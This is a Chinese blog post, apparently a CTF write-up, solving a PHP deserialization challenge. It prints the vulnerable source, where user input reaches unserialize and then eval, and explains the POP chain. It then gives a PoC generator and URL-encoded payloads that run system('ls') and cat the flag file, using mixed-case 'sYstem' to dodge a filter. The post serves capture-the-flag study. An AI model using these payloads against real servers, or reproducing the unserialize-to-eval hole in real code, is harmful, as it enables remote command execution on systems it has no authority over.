CTF-easy_php

ytxy

已于 2023-02-01 14:28:32 修改

阅读量537

点赞数 1

文章标签： php web安全

于 2023-02-01 14:27:18 首次发布

本文链接：https://blog.csdn.net/m0_62593857/article/details/128832600

版权

前言

打比赛做题时发现了一道和NISACTF2022 babyserialize很相似的题，这里记录一下

题目

<?php
include "waf.php";
class CTF{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class love{
    public $ext;
    public $x;
    public function __wakeup(){
        die("Maybe it failed?");
    }
    public function __destruct(){
        $this->ext->ZZU_ctf_is_fun($this->x);
    }
}

class Ilovectf{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="please_don't_copy";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if($this->fun=md5($this->fun)){
            strtoupper($this->a);
        }
        
    }
}


if(isset($_GET['unser'])){
    @unserialize($_GET['unser']);
}else{
    highlight_file(__FILE__);
}

?>

php反序列化，很明显要通过构造pop链来调用eval函数，参数为我们想要执行的命令

pop链

love::_destruct->Ilovectf::_call->four::_set->Ilovectf::_toString->CTF::_invoke

poc

<?php
	class CTF{
    public $fun="show_me_flag";
    public $txw4ever;
    }
    class love{
    public $ext;
    public $x;
	}
	class Ilovectf{
    public $huang;
    public $su;
	}
	class four{
    public $a;
    private $fun;
	}
	$ct = new CTF();
	$ct->txw4ever = "sYstem('ls /');";#php对函数大小写不敏感，绕过过滤
	$b = new love();
	$att = new Ilovectf();
	$b->ext = $att;
	$b->x = "1e3";#只要md5的值不为0都行
	$c = new four();
	$att->huang = $c;
	$c->a = $att;
	$att->su = $ct;
	echo urlencode(serialize($b));
?>

奇怪的是传参后并没有触发love::_wakeup（明明我在自己的服务器还触发了。。。有没有大佬能解答一下）

payload

?unser=O%3A4%3A%22love%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovectf%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3BN%3B%7Ds%3A2%3A%22su%22%3BO%3A3%3A%22CTF%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A12%3A%22show_me_flag%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A13%3A%22sYstem%28%27ls%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3Bs%3A3%3A%221e3%22%3B%7D

得到

修改命令为sYstem('cat /fllllaaaaaagggg-c602b1212e9154a40fb6cabeabea64d6')

payload如下:

?unser=O%3A4%3A"love"%3A2%3A%7Bs%3A3%3A"ext"%3BO%3A8%3A"Ilovectf"%3A2%3A%7Bs%3A5%3A"huang"%3BO%3A4%3A"four"%3A2%3A%7Bs%3A1%3A"a"%3Br%3A2%3Bs%3A9%3A"%00four%00fun"%3BN%3B%7Ds%3A2%3A"su"%3BO%3A3%3A"CTF"%3A2%3A%7Bs%3A3%3A"fun"%3Bs%3A12%3A"show_me_flag"%3Bs%3A8%3A"txw4ever"%3Bs%3A64%3A"sYstem%28%27cat+%2Ffllllaaaaaagggg-c602b1212e9154a40fb6cabeabea64d6%27%29%3B"%3B%7D%7Ds%3A1%3A"x"%3Bs%3A3%3A"1e3"%3B%7D

得到flag{It_is_tmd_easy_php_orz}